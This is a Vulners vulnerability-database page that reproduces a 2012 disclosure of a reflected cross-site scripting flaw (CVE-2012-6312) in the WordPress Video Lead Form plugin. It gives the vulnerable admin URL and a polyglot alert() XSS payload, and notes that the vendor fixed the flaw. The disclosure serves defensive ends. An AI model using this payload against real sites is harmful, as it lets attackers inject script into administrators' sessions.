Vulners
Lucene search
WordPress Video Lead Form 0.5 Cross Site Scripting
🗓️ 30 Nov 2012 00:00:00Reported by Aditya BalapureType 
packetstorm🔗 packetstormsecurity.com👁 40 Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2012-6312 | 29 Nov 201200:00 | – | circl |
 | CVE-2012-6312 | 11 Dec 201211:00 | – | cve |
 | CVE-2012-6312 | 11 Dec 201211:00 | – | cvelist |
 | EUVD-2012-6167 | 7 Oct 202500:30 | – | euvd |
 | CVE-2012-6312 | 11 Dec 201212:18 | – | nvd |
 | WordPress Video Lead Form Plugin - Cross Site Scripting | 29 Nov 201200:00 | – | patchstack |
 | Cross site scripting | 11 Dec 201212:18 | – | prion |
 | CVE-2012-6312 | 22 May 202512:13 | – | redhatcve |
 | Update on CVE assigned for Video Lead Form Plugin Cross-Site | 10 Dec 201200:00 | – | securityvulns |
| Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 10 Dec 201200:00 | – | securityvulns |
10
`#############################
Exploit Title : Video Lead Form Plugin Cross-Site Scripting Vulnerabilities which affects Wordpress URL
Author: Aditya Balapure
home: http://adityabalapure.blogspot.in/
Date: 24/11/12
version: 0.5
software link: http://wordpress.org/extend/plugins/video-lead-form/
#############################
Video Lead Form plugin description
Video Lead Form is a sales and marketing dream tool. Many people use video as a means of engaging their visitors but then have to find awkward ways to ask their visitors to submit a contact or lead form. Video Lead Form solves this problem by embedding the form directly into the video. Users of Video Lead Form can choose where in the video the form should appear, either at the beginning, the end, or five seconds after the video starts.
When a viewer submits the form, their information is emailed to you, simple as that. Video Lead Form can also be integrated with Salesforce for an even easier way to generate and manage sales leads.
##########################
XSS location
The Video Lead Form Plugin in Wordpress http://wordpress.org/extend/plugins/video-lead-form/ has a Reflective XSS vulnerability in the browser URL which affects Wordpress 3.4.2 (Platform Used)
Original URL - http://localhost/wordpress/wp-admin/admin.php?page=video-lead-form&errMsg=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
Modified URL - http://localhost/wordpress/wp-admin/admin.php?page=video-lead-form&errMsg=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
Script Used-
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
##########################
Vendor Notification
24/11/2012 to: - Vendor notified awaiting action
29/11/2012 - Fixed and closed
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Nov 2012 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.01143